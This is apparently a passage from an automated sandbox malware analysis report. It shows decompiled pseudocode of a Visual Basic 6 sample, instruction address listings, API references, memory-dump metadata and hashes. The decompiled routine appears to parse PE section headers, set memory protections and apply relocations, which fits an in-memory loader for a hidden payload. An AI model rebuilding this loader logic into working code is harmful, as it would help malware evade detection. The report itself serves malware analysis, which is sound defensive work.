																			__eflags = _t293;
																			asm("fclex");
																			if(_t293 < 0) {
																				 *_t403(_t293, _t569, 0x4104c8, 0x48);
																			}
																			_t297 = E00423FD0();
																			_t567 = _t297;
																			__imp____vbaFreeStrList(2,  &_v284,  &_v288, 0, _v192,  *_t540(_v284,  *_t540(_v288)));
																			__eflags = _t567;
																			if(_t567 != 0) {
																				goto L134;
																			}
																			_v276 = 3;
																			_push(0x423ca1);
																			return _t297;
																		}
																		_v276 = 3;
																		_push(0x423ca1);
																		return _t286;
																	}
																} else {
																	_v276 = 1;
																	_push(0x423ca1);
																	return _t278;
																}
															}
															__eflags = _t273;
															_v1552 = _t273;
															if(_t273 == 0) {
																L108:
																return _t564;
															} else {
																_push( &_v1560);
																_t304 = E00423F10(_t401, 0, _t536, 5);
																__eflags = _t304;
																if(_t304 != 0) {
																	__eflags = _v1560;
																	if(_v1560 <= 0) {
																		goto L108;
																	} else {
																		_t305 = _v1564;
																		__eflags = _t305;
																		if(_t305 <= 0) {
																			goto L108;
																		} else {
																			_t306 = _t305 + _t536;
																			__eflags = _t306;
																			if(_t306 < 0) {
																				goto L109;
																			}
																			_t588 = _t306;
																			_t307 = E004240A0( &_v1576);
																			_push(8);
																			_push(_t588);
																			_push(_t307);
																			E00424000();
																			__eflags = _v1592;
																			if(_v1592 == 0) {
																				goto L108;
																			} else {
																				_push(_t401);
																				while(1) {
																					_t453 = _v1572;
																					_t564 = _t588 + 8;
																					__eflags = _t564;
																					_t309 = _t453;
																					if(_t564 < 0) {
																						goto L109;
																					}
																					_t310 = _t309 - 8;
																					__eflags = _t310;
																					if(_t310 < 0) {
																						goto L109;
																					}
																					asm("cdq");
																					_t401 = _t310 - _t494 >> 1;
																					__eflags = _t401;
																					if(_t401 > 0) {
																						do {
																							_t502 =  &_v1568;
																							_t317 = E004240A0(_t502);
																							_push(2);
																							_push(_t564);
																							_push(_t317);
																							E00424000();
																							_t455 = _v1584;
																							asm("cdq");
																							_t494 = _t502 & 0x00000fff;
																							__eflags = (_t455 + _t494 >> 0x0000000c & 0x0000000f) - 3;
																							if((_t455 + _t494 >> 0x0000000c & 0x0000000f) == 3) {
																								_t457 = (_t455 & 0x00000fff) + _v1576;
																								__eflags = _t457;
																								if(_t457 < 0) {
																									goto L109;
																								}
																								_t458 = _t457 + _t536;
																								__eflags = _t458;
																								_push( &_v1580);
																								if(_t458 < 0) {
																									goto L109;
																								}
																								_t536 = _t458;
																								_t324 = E004240A0();
																								_push(4);
																								_push(_t536);
																								_push(_t324);
																								E00424000();
																								_t460 = _v1572 + _v1596;
																								__eflags = _t460;
																								_t494 =  &_v1596;
																								if(_t460 < 0) {
																									goto L109;
																								}
																								_v1580 = _t460;
																								_t326 = E004240A0(_t494);
																								_push(4);
																								_push(_t326);
																								_push(_t536);
																								E00424000();
																								_t536 = _v1316;
																							}
																							_t564 = _t564 + 2;
																							__eflags = _t564;
																							if(_t564 < 0) {
																								goto L109;
																							}
																							_t401 = _t401 - 1;
																							__eflags = _t401;
																							if(_t401 < 0) {
																								goto L109;
																							}
																							__eflags = _t401;
																						} while (_t401 > 0);
																						_t453 = _v1572;
																					}
																					_t454 = _t453 + _t588;
																					__eflags = _t454;
																					if(_t454 < 0) {
																						goto L109;
																					}
																					_t588 = _t454;
																					_t313 = E004240A0( &_v1576);
																					_push(8);
																					_push(_t588);
																					_push(_t313);
																					E00424000();
																					__eflags = _v1592;
																					if(_v1592 != 0) {
																						continue;
																					}
																					__eflags = 0;
																					return 0;
																					goto L136;
																				}
																				goto L109;
																			}
																		}
																	}
																} else {
																	return 2;
																}
															}
														} else {
															return 1;
														}
													} else {
														_t562 = _t268;
														while(1) {
															_v1256 = _t562;
															_t330 = E004240A0( &_v1276);
															_push(0x14);
															_push(_t562);
															_push(_t330);
															E00424000();
															__eflags = _v1292;
															_t333 = _v1280;
															if(_v1292 != 0) {
																goto L60;
															}
															__eflags = _v1260;
															if(_v1260 != 0) {
																goto L60;
															} else {
																__eflags = _v1268;
																if(_v1268 != 0) {
																	goto L60;
																} else {
																	__eflags = _t333;
																	if(__eflags != 0) {
																		L61:
																		if(__eflags <= 0) {
																			goto L76;
																		} else {
																			_t334 = _t333 + _t532;
																			__eflags = _t334;
																			if(_t334 < 0) {
																				goto L81;
																			} else {
																				_push(_t334);
																				_t401 = E00424030();
																				__eflags = _t401;
																				if(_t401 == 0) {
																					return 5;
																				} else {
																					_t577 = _v1276;
																					__eflags = _t577;
																					if(_t577 == 0) {
																						_t577 = _v1260;
																					}
																					_t562 = _t577 + _t532;
																					__eflags = _t562;
																					_push( &_v1284);
																					if(_t562 < 0) {
																						goto L81;
																					} else {
																						_t337 = E004240A0();
																						_push(4);
																						_push(_t562);
																						_push(_t337);
																						E00424000();
																						_t339 = _v1300;
																						__eflags = _t339;
																						while(__eflags != 0) {
																							if(__eflags >= 0) {
																								_t340 = _t339 + 2;
																								__eflags = _t340;
																								if(_t340 < 0) {
																									goto L81;
																								} else {
																									_t341 = _t340 + _t532;
																									__eflags = _t341;
																									if(_t341 < 0) {
																										goto L81;
																									} else {
																										goto L72;
																									}
																								}
																							} else {
																								_t341 = _t339 & 0x0000ffff;
																								L72:
																								_push(_t341);
																								_push(_t401);
																								_t342 = E00424040();
																								_t562 = _t562 + 4;
																								__eflags = _t562;
																								_v1288 = _t342;
																								_push( &_v1292);
																								if(_t562 < 0) {
																									goto L81;
																								} else {
																									_t344 = E004240A0();
																									_push(4);
																									_push(_t562);
																									_push(_t344);
																									E00424000();
																									_t346 = E004240A0( &_v1296);
																									_push(4);
																									_push(_t346);
																									_t507 = _v1280 + _t532;
																									__eflags = _t507;
																									if(_t507 < 0) {
																										goto L81;
																									} else {
																										_push(_t507);
																										E00424000();
																										_t349 = _v1272 + 4;
																										__eflags = _t349;
																										if(_t349 < 0) {
																											goto L81;
																										} else {
																											goto L75;
																										}
																									}
																								}
																							}
																							goto L136;
																							L75:
																							_v1260 = _t349;
																							_t339 = _v1284;
																							__eflags = _t339;
																						}
																						goto L76;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _v1272;
																		if(_v1272 == 0) {
																			__eflags = 0;
																			return 0;
																		} else {
																			L76:
																			_t562 = _v1256 + 0x14;
																			__eflags = _t562;
																			if(_t562 < 0) {
																				goto L81;
																			} else {
																				continue;
																			}
																		}
																	}
																}
															}
															goto L136;
															L60:
															__eflags = _t333;
															goto L61;
														}
													}
												}
											}
										} else {
											return 2;
										}
									}
								} else {
									return 1;
								}
							} else {
								_t354 = _t259 + 0x14;
								__eflags = _t354;
								if(_t354 < 0) {
									goto L44;
								} else {
									_t355 = _t354 + _t491;
									__eflags = _t355;
									if(_t355 < 0) {
										goto L44;
									} else {
										_t529 = _t355;
										_t357 = _v922 - 1;
										__eflags = _t357;
										if(_t357 < 0) {
											goto L44;
										} else {
											_t588 = _t357;
											__eflags = _t588;
											if(_t588 < 0) {
												return 0;
											} else {
												while(1) {
													_t359 = E004240A0( &_v968);
													_push(0x28);
													_push(_t529);
													_push(_t359);
													E00424000();
													_t361 = _v948;
													__eflags = _t361 & 0x20000000;
													if((_t361 & 0x20000000) == 0) {
														__eflags = _t361 & 0x40000000;
														if((_t361 & 0x40000000) == 0) {
															asm("sbb eax, eax");
															_t365 = ( ~(_t361 & 0x80000000) & 0x00000007) + 1;
															__eflags = _t365;
														} else {
															asm("sbb eax, eax");
															_t365 = ( ~(_t361 & 0x80000000) & 0x00000002) + 2;
														}
													} else {
														__eflags = _t361 & 0x40000000;
														if((_t361 & 0x40000000) == 0) {
															asm("sbb eax, eax");
															_t365 = ( ~(_t361 & 0x80000000) & 0x00000070) + 0x10;
														} else {
															asm("sbb eax, eax");
															_t365 = ( ~(_t361 & 0x80000000) & 0x00000020) + 0x20;
														}
													}
													_push(E004240A0( &_v972));
													_push(_t365);
													_t561 = _v680;
													_t467 = _v960 + _t561;
													__eflags = _t467;
													_push(_v964);
													if(_t467 < 0) {
														goto L44;
													}
													_push(_t467);
													_t368 = E00423FE0();
													__eflags = _t368;
													if(_t368 == 0) {
														return 4;
													} else {
														_t529 = _t529 + 0x28;
														__eflags = _t529;
														if(_t529 < 0) {
															goto L44;
														} else {
															_t401 = _t401 + 1;
															__eflags = _t401;
															if(_t401 < 0) {
																goto L44;
															} else {
																__eflags = _t401 - _t588;
																if(_t401 <= _t588) {
																	continue;
																} else {
																	__eflags = 0;
																	return 0;
																}
															}
														}
													}
													goto L136;
												}
												goto L44;
											}
										}
									}
								}
							}
						} else {
							return 1;
						}
					}
				} else {
					E00423FC0(_t227, _t227);
					asm("wait");
					_t586 = __imp____vbaFreeVar;
					 *_t586(0x423337);
					 *_t586();
					 *_t586();
					return  *_t586();
				}
				goto L136;
			}













































































































































































































                                                                                0x004230d0
                                                                                0x004230d1
                                                                                0x004230d3
                                                                                0x004230e2
                                                                                0x004230e9
                                                                                0x004230f2
                                                                                0x004230f5
                                                                                0x004230fc
                                                                                0x0042310c
                                                                                0x0042310c
                                                                                0x00423118
                                                                                0x0042311b
                                                                                0x0042311e
                                                                                0x00423124
                                                                                0x0042312a
                                                                                0x00423130
                                                                                0x00423136
                                                                                0x00423138
                                                                                0x0042313e
                                                                                0x00423144
                                                                                0x0042314a
                                                                                0x00423150
                                                                                0x00423156
                                                                                0x00423167
                                                                                0x00423170
                                                                                0x00423186
                                                                                0x0042318c
                                                                                0x00423192
                                                                                0x004231a2
                                                                                0x004231b2
                                                                                0x004231b5
                                                                                0x004231bc
                                                                                0x004231c8
                                                                                0x004231d7
                                                                                0x004231d7
                                                                                0x004231d9
                                                                                0x004231e0
                                                                                0x004231f2
                                                                                0x004231fc
                                                                                0x00423204
                                                                                0x00423205
                                                                                0x00423206
                                                                                0x00423211
                                                                                0x00423213
                                                                                0x0042321e
                                                                                0x0042321f
                                                                                0x0042322a
                                                                                0x0042322b
                                                                                0x00423236
                                                                                0x00423237
                                                                                0x00423242
                                                                                0x00423243
                                                                                0x00423248
                                                                                0x0042324d
                                                                                0x0042324f
                                                                                0x00423254
                                                                                0x00423255
                                                                                0x00423256
                                                                                0x00423256
                                                                                0x0042325b
                                                                                0x00423261
                                                                                0x00423270
                                                                                0x0042327a
                                                                                0x0042327c
                                                                                0x00423282
                                                                                0x0042328d
                                                                                0x0042328d
                                                                                0x00423293
                                                                                0x004232ab
                                                                                0x004232b5
                                                                                0x004232bf
                                                                                0x004232cd
                                                                                0x004232ce
                                                                                0x004232d4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004232d6
                                                                                0x004232d6
                                                                                0x004232ea
                                                                                0x004232ea
                                                                                0x004232ec
                                                                                0x00423351
                                                                                0x0042335d
                                                                                0x00423368
                                                                                0x00423369
                                                                                0x0042336d
                                                                                0x0042336e
                                                                                0x00423372
                                                                                0x00423373
                                                                                0x0042337c
                                                                                0x0042339a
                                                                                0x0042339a
                                                                                0x0042339c
                                                                                0x0042339e
                                                                                0x004233a0
                                                                                0x004233a4
                                                                                0x004233b1
                                                                                0x004233b4
                                                                                0x004233bd
                                                                                0x004233be
                                                                                0x004233c0
                                                                                0x004233c1
                                                                                0x004233c2
                                                                                0x004233c3
                                                                                0x004233c8
                                                                                0x004233cd
                                                                                0x00423425
                                                                                0x00423425
                                                                                0x00423427
                                                                                0x00423429
                                                                                0x00423429
                                                                                0x0042342e
                                                                                0x00423430
                                                                                0x00423437
                                                                                0x0042343c
                                                                                0x0042343e
                                                                                0x0042343f
                                                                                0x00423440
                                                                                0x00423440
                                                                                0x0042344a
                                                                                0x0042344f
                                                                                0x00423455
                                                                                0x00423456
                                                                                0x00423457
                                                                                0x00423460
                                                                                0x00423468
                                                                                0x0042346c
                                                                                0x00423471
                                                                                0x00423473
                                                                                0x00423478
                                                                                0x00423479
                                                                                0x00423483
                                                                                0x00423488
                                                                                0x0042348e
                                                                                0x0042348f
                                                                                0x00423490
                                                                                0x0042349a
                                                                                0x0042349f
                                                                                0x004234a5
                                                                                0x004234a6
                                                                                0x004234a7
                                                                                0x004234b0
                                                                                0x004234b5
                                                                                0x004234ba
                                                                                0x004234bc
                                                                                0x004234c1
                                                                                0x004234c2
                                                                                0x004234d2
                                                                                0x004233cf
                                                                                0x004233cf
                                                                                0x004233d3
                                                                                0x004233d3
                                                                                0x004233d6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004233dc
                                                                                0x004233de
                                                                                0x004233e2
                                                                                0x004233e4
                                                                                0x004233e9
                                                                                0x004233ea
                                                                                0x004233ec
                                                                                0x004233ed
                                                                                0x004233ed
                                                                                0x004233f2
                                                                                0x004233fb
                                                                                0x004233fc
                                                                                0x004233fe
                                                                                0x00423404
                                                                                0x00423406
                                                                                0x00423413
                                                                                0x00423414
                                                                                0x00423415
                                                                                0x00423416
                                                                                0x00423418
                                                                                0x00423419
                                                                                0x0042341e
                                                                                0x00423423
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423423
                                                                                0x004234d5
                                                                                0x004234e6
                                                                                0x004234e7
                                                                                0x004234e8
                                                                                0x004234e9
                                                                                0x004234f5
                                                                                0x004234f7
                                                                                0x004234fe
                                                                                0x00423502
                                                                                0x00423502
                                                                                0x00423502
                                                                                0x0042350f
                                                                                0x00423511
                                                                                0x00423515
                                                                                0x00423517
                                                                                0x0042351c
                                                                                0x0042351e
                                                                                0x00423532
                                                                                0x00423537
                                                                                0x00423537
                                                                                0x0042353a
                                                                                0x00423647
                                                                                0x00423647
                                                                                0x00423656
                                                                                0x00423657
                                                                                0x00423658
                                                                                0x00423664
                                                                                0x00423664
                                                                                0x00423666
                                                                                0x0042366d
                                                                                0x00423671
                                                                                0x00423677
                                                                                0x0042367f
                                                                                0x00423681
                                                                                0x00423685
                                                                                0x00423689
                                                                                0x0042368b
                                                                                0x0042368f
                                                                                0x00423693
                                                                                0x00423697
                                                                                0x0042369b
                                                                                0x004236a0
                                                                                0x004236a2
                                                                                0x004236b5
                                                                                0x004236bd
                                                                                0x00423838
                                                                                0x00423843
                                                                                0x004236c3
                                                                                0x004236c7
                                                                                0x004236cb
                                                                                0x004236d0
                                                                                0x004236d2
                                                                                0x004236e9
                                                                                0x004236eb
                                                                                0x00000000
                                                                                0x004236f1
                                                                                0x004236f1
                                                                                0x004236f5
                                                                                0x004236f7
                                                                                0x00000000
                                                                                0x004236fd
                                                                                0x004236fd
                                                                                0x004236fd
                                                                                0x004236ff
                                                                                0x00423846
                                                                                0x00423846
                                                                                0x00423856
                                                                                0x00423857
                                                                                0x00423858
                                                                                0x00423864
                                                                                0x00423864
                                                                                0x00423866
                                                                                0x00423873
                                                                                0x00423875
                                                                                0x00423879
                                                                                0x0042387d
                                                                                0x0042387f
                                                                                0x00423883
                                                                                0x00423887
                                                                                0x0042388b
                                                                                0x0042388f
                                                                                0x00423894
                                                                                0x00423896
                                                                                0x004238a9
                                                                                0x004238af
                                                                                0x004238af
                                                                                0x004238b1
                                                                                0x00423a29
                                                                                0x00423a29
                                                                                0x00423a30
                                                                                0x00423a33
                                                                                0x00423a36
                                                                                0x00423a41
                                                                                0x00423a42
                                                                                0x00423a4f
                                                                                0x00423a50
                                                                                0x00423a51
                                                                                0x00423a52
                                                                                0x00423a55
                                                                                0x00423a69
                                                                                0x00423a76
                                                                                0x00423a78
                                                                                0x00423a7e
                                                                                0x00423a84
                                                                                0x00423a8a
                                                                                0x00423a8f
                                                                                0x00423a91
                                                                                0x00423aa7
                                                                                0x00423aad
                                                                                0x00423ab9
                                                                                0x00423ab9
                                                                                0x00423abf
                                                                                0x00423ad4
                                                                                0x00423ad7
                                                                                0x00423ad9
                                                                                0x00423adb
                                                                                0x00423af0
                                                                                0x00423add
                                                                                0x00423add
                                                                                0x00423aec
                                                                                0x00423aec
                                                                                0x00423af6
                                                                                0x00423afc
                                                                                0x00423b08
                                                                                0x00423b08
                                                                                0x00423b0e
                                                                                0x00423b23
                                                                                0x00423b26
                                                                                0x00423b28
                                                                                0x00423b2a
                                                                                0x00423b35
                                                                                0x00423b35
                                                                                0x00423b3d
                                                                                0x00423b5f
                                                                                0x00423b74
                                                                                0x00423b76
                                                                                0x00423b7f
                                                                                0x00423b81
                                                                                0x00423c7a
                                                                                0x00423c7a
                                                                                0x00423c7d
                                                                                0x00423c82
                                                                                0x00000000
                                                                                0x00423b87
                                                                                0x00423b87
                                                                                0x00423b8e
                                                                                0x00423ba4
                                                                                0x00423ba9
                                                                                0x00423bab
                                                                                0x00423bb7
                                                                                0x00423bb7
                                                                                0x00423bbd
                                                                                0x00423bd2
                                                                                0x00423bd5
                                                                                0x00423bd7
                                                                                0x00423bd9
                                                                                0x00423be4
                                                                                0x00423be4
                                                                                0x00423be6
                                                                                0x00423beb
                                                                                0x00423bed
                                                                                0x00423bf9
                                                                                0x00423bf9
                                                                                0x00423bff
                                                                                0x00423c14
                                                                                0x00423c17
                                                                                0x00423c19
                                                                                0x00423c1b
                                                                                0x00423c26
                                                                                0x00423c26
                                                                                0x00423c45
                                                                                0x00423c5a
                                                                                0x00423c5c
                                                                                0x00423c65
                                                                                0x00423c67
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423c69
                                                                                0x00423c73
                                                                                0x00000000
                                                                                0x00423c73
                                                                                0x00423b90
                                                                                0x00423b9a
                                                                                0x00000000
                                                                                0x00423b9a
                                                                                0x00423a93
                                                                                0x00423a93
                                                                                0x00423a9d
                                                                                0x00000000
                                                                                0x00423a9d
                                                                                0x00423a91
                                                                                0x004238b7
                                                                                0x004238b9
                                                                                0x004238bd
                                                                                0x00423a1b
                                                                                0x00423a26
                                                                                0x004238c3
                                                                                0x004238c7
                                                                                0x004238cb
                                                                                0x004238d0
                                                                                0x004238d2
                                                                                0x004238e5
                                                                                0x004238e9
                                                                                0x00000000
                                                                                0x004238ef
                                                                                0x004238ef
                                                                                0x004238f3
                                                                                0x004238f5
                                                                                0x00000000
                                                                                0x004238fb
                                                                                0x004238fb
                                                                                0x004238fb
                                                                                0x00423901
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423908
                                                                                0x0042390a
                                                                                0x0042390f
                                                                                0x00423911
                                                                                0x00423912
                                                                                0x00423913
                                                                                0x00423918
                                                                                0x0042391c
                                                                                0x00000000
                                                                                0x00423922
                                                                                0x00423922
                                                                                0x00423923
                                                                                0x00423923
                                                                                0x00423929
                                                                                0x00423929
                                                                                0x0042392c
                                                                                0x0042392e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423934
                                                                                0x00423934
                                                                                0x00423937
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0042393d
                                                                                0x00423942
                                                                                0x00423944
                                                                                0x00423946
                                                                                0x0042394c
                                                                                0x0042394c
                                                                                0x00423951
                                                                                0x00423956
                                                                                0x00423958
                                                                                0x00423959
                                                                                0x0042395a
                                                                                0x0042395f
                                                                                0x00423965
                                                                                0x00423966
                                                                                0x00423974
                                                                                0x00423976
                                                                                0x00423982
                                                                                0x00423982
                                                                                0x00423988
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0042398e
                                                                                0x0042398e
                                                                                0x00423990
                                                                                0x00423991
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423997
                                                                                0x00423999
                                                                                0x0042399e
                                                                                0x004239a0
                                                                                0x004239a1
                                                                                0x004239a2
                                                                                0x004239af
                                                                                0x004239af
                                                                                0x004239b1
                                                                                0x004239b5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004239b8
                                                                                0x004239bc
                                                                                0x004239c1
                                                                                0x004239c3
                                                                                0x004239c4
                                                                                0x004239c5
                                                                                0x004239ca
                                                                                0x004239ca
                                                                                0x004239d1
                                                                                0x004239d1
                                                                                0x004239d4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004239d6
                                                                                0x004239d6
                                                                                0x004239d9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004239db
                                                                                0x004239db
                                                                                0x004239e3
                                                                                0x004239e3
                                                                                0x004239e7
                                                                                0x004239e7
                                                                                0x004239ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004239f0
                                                                                0x004239f2
                                                                                0x004239f7
                                                                                0x004239f9
                                                                                0x004239fa
                                                                                0x004239fb
                                                                                0x00423a04
                                                                                0x00423a06
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423a0f
                                                                                0x00423a18
                                                                                0x00000000
                                                                                0x00423a18
                                                                                0x00000000
                                                                                0x00423923
                                                                                0x0042391c
                                                                                0x004238f5
                                                                                0x004238d4
                                                                                0x004238e2
                                                                                0x004238e2
                                                                                0x004238d2
                                                                                0x00423898
                                                                                0x004238a6
                                                                                0x004238a6
                                                                                0x00423705
                                                                                0x00423705
                                                                                0x00423707
                                                                                0x0042370b
                                                                                0x00423710
                                                                                0x00423715
                                                                                0x00423717
                                                                                0x00423718
                                                                                0x00423719
                                                                                0x00423722
                                                                                0x00423724
                                                                                0x00423728
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0042372e
                                                                                0x00423730
                                                                                0x00000000
                                                                                0x00423732
                                                                                0x00423736
                                                                                0x00423738
                                                                                0x00000000
                                                                                0x0042373a
                                                                                0x0042373a
                                                                                0x0042373c
                                                                                0x00423751
                                                                                0x00423751
                                                                                0x00000000
                                                                                0x00423757
                                                                                0x00423757
                                                                                0x00423757
                                                                                0x00423759
                                                                                0x00000000
                                                                                0x0042375f
                                                                                0x0042375f
                                                                                0x00423765
                                                                                0x00423767
                                                                                0x00423769
                                                                                0x00423827
                                                                                0x0042376f
                                                                                0x0042376f
                                                                                0x00423773
                                                                                0x00423775
                                                                                0x00423777
                                                                                0x00423777
                                                                                0x0042377f
                                                                                0x0042377f
                                                                                0x00423781
                                                                                0x00423782
                                                                                0x00000000
                                                                                0x00423788
                                                                                0x00423788
                                                                                0x0042378d
                                                                                0x0042378f
                                                                                0x00423790
                                                                                0x00423791
                                                                                0x00423796
                                                                                0x0042379a
                                                                                0x0042379c
                                                                                0x0042379e
                                                                                0x004237a7
                                                                                0x004237a7
                                                                                0x004237aa
                                                                                0x00000000
                                                                                0x004237b0
                                                                                0x004237b0
                                                                                0x004237b0
                                                                                0x004237b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004237b2
                                                                                0x004237a0
                                                                                0x004237a0
                                                                                0x004237b8
                                                                                0x004237b8
                                                                                0x004237b9
                                                                                0x004237ba
                                                                                0x004237bf
                                                                                0x004237bf
                                                                                0x004237c2
                                                                                0x004237ca
                                                                                0x004237cb
                                                                                0x00000000
                                                                                0x004237cd
                                                                                0x004237cd
                                                                                0x004237d2
                                                                                0x004237d4
                                                                                0x004237d5
                                                                                0x004237d6
                                                                                0x004237e0
                                                                                0x004237e5
                                                                                0x004237e7
                                                                                0x004237ec
                                                                                0x004237ec
                                                                                0x004237ee
                                                                                0x00000000
                                                                                0x004237f0
                                                                                0x004237f0
                                                                                0x004237f1
                                                                                0x004237fa
                                                                                0x004237fa
                                                                                0x004237fd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004237fd
                                                                                0x004237ee
                                                                                0x004237cb
                                                                                0x00000000
                                                                                0x004237ff
                                                                                0x004237ff
                                                                                0x00423803
                                                                                0x00423807
                                                                                0x00423807
                                                                                0x00000000
                                                                                0x0042379c
                                                                                0x00423782
                                                                                0x00423769
                                                                                0x00423759
                                                                                0x0042373e
                                                                                0x00423742
                                                                                0x00423744
                                                                                0x0042382c
                                                                                0x00423835
                                                                                0x0042374a
                                                                                0x0042380b
                                                                                0x0042380f
                                                                                0x0042380f
                                                                                0x00423812
                                                                                0x00000000
                                                                                0x00423814
                                                                                0x00000000
                                                                                0x00423814
                                                                                0x00423812
                                                                                0x00423744
                                                                                0x0042373c
                                                                                0x00423738
                                                                                0x00000000
                                                                                0x0042374f
                                                                                0x0042374f
                                                                                0x00000000
                                                                                0x0042374f
                                                                                0x00423707
                                                                                0x004236ff
                                                                                0x004236f7
                                                                                0x004236d4
                                                                                0x004236e2
                                                                                0x004236e2
                                                                                0x004236d2
                                                                                0x004236a4
                                                                                0x004236b2
                                                                                0x004236b2
                                                                                0x00423540
                                                                                0x00423540
                                                                                0x00423540
                                                                                0x00423543
                                                                                0x00000000
                                                                                0x00423549
                                                                                0x00423549
                                                                                0x00423549
                                                                                0x0042354b
                                                                                0x00000000
                                                                                0x00423551
                                                                                0x00423551
                                                                                0x00423558
                                                                                0x00423558
                                                                                0x0042355c
                                                                                0x00000000
                                                                                0x00423562
                                                                                0x00423562
                                                                                0x00423565
                                                                                0x00423567
                                                                                0x00423644
                                                                                0x0042356d
                                                                                0x0042356d
                                                                                0x00423572
                                                                                0x00423577
                                                                                0x00423579
                                                                                0x0042357a
                                                                                0x0042357b
                                                                                0x00423580
                                                                                0x00423584
                                                                                0x00423589
                                                                                0x004235b4
                                                                                0x004235b9
                                                                                0x004235d3
                                                                                0x004235d8
                                                                                0x004235d8
                                                                                0x004235bb
                                                                                0x004235c2
                                                                                0x004235c7
                                                                                0x004235c7
                                                                                0x0042358b
                                                                                0x0042358b
                                                                                0x00423590
                                                                                0x004235aa
                                                                                0x004235af
                                                                                0x00423592
                                                                                0x00423599
                                                                                0x0042359e
                                                                                0x0042359e
                                                                                0x00423590
                                                                                0x004235e5
                                                                                0x004235e6
                                                                                0x004235eb
                                                                                0x004235f6
                                                                                0x004235f6
                                                                                0x004235f8
                                                                                0x004235f9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004235fb
                                                                                0x004235fc
                                                                                0x00423601
                                                                                0x00423603
                                                                                0x00423635
                                                                                0x00423605
                                                                                0x00423605
                                                                                0x00423605
                                                                                0x00423608
                                                                                0x00000000
                                                                                0x0042360a
                                                                                0x0042360a
                                                                                0x0042360a
                                                                                0x0042360d
                                                                                0x00000000
                                                                                0x0042360f
                                                                                0x0042360f
                                                                                0x00423611
                                                                                0x00000000
                                                                                0x00423617
                                                                                0x0042361a
                                                                                0x00423623
                                                                                0x00423623
                                                                                0x00423611
                                                                                0x0042360d
                                                                                0x00423608
                                                                                0x00000000
                                                                                0x00423603
                                                                                0x00000000
                                                                                0x0042356d
                                                                                0x00423567
                                                                                0x0042355c
                                                                                0x0042354b
                                                                                0x00423543
                                                                                0x00423520
                                                                                0x0042352f
                                                                                0x0042352f
                                                                                0x0042351e
                                                                                0x004232ee
                                                                                0x004232ef
                                                                                0x004232f4
                                                                                0x00423316
                                                                                0x0042331f
                                                                                0x00423324
                                                                                0x0042332c
                                                                                0x00423336
                                                                                0x00423336
                                                                                0x00000000

                                                                                APIs
                                                                                • __vbaCheckTypeVar.MSVBVM60(?,00411A18,?,?), ref: 00423167
                                                                                • __vbaVarLateMemCallLd.MSVBVM60(?,?,hwnd,00000000), ref: 00423186
                                                                                • __vbaI4Var.MSVBVM60(?,00000001,?), ref: 004231A8
                                                                                • __vbaI4Var.MSVBVM60(?,00000000), ref: 004231B2
                                                                                • __vbaSetSystemError.MSVBVM60(00000000), ref: 004231BC
                                                                                • __vbaFreeVar.MSVBVM60 ref: 004231C8
                                                                                • __vbaVarMove.MSVBVM60 ref: 004231FC
                                                                                • #535.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0042325B
                                                                                • __vbaVarMove.MSVBVM60 ref: 0042327A
                                                                                • #535.MSVBVM60 ref: 0042328D
                                                                                • __vbaVarSub.MSVBVM60(?,?,00000004), ref: 004232C5
                                                                                • __vbaVarTstLt.MSVBVM60(?,00000000), ref: 004232CF
                                                                                • #598.MSVBVM60 ref: 004232D6
                                                                                • __vbaFreeVar.MSVBVM60(00423337,?), ref: 0042331F
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00423324
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0042332C
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00423334
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$#535Move$#598CallCheckErrorLateSystemType
                                                                                • String ID: hwnd
                                                                                • API String ID: 631025523-1070177613
                                                                                • Opcode ID: c0b122c8a111f0edc5e92aa2e3e53d813209fdaff6da07b4683dadb3b830457c
                                                                                • Instruction ID: fe5d10b2d917b570d85bf457c80aed235935dcd3a65971487dd3497630d20b78
                                                                                • Opcode Fuzzy Hash: c0b122c8a111f0edc5e92aa2e3e53d813209fdaff6da07b4683dadb3b830457c
                                                                                • Instruction Fuzzy Hash: 4D5149B1A00268ABDB20DF64DD85BDEB778EF88701F4044DAE509B7250DB785B85CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00417770, Relevance: 33.3, APIs: 22, Instructions: 277COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 20%
                                                                                			E00417770(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v0;
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
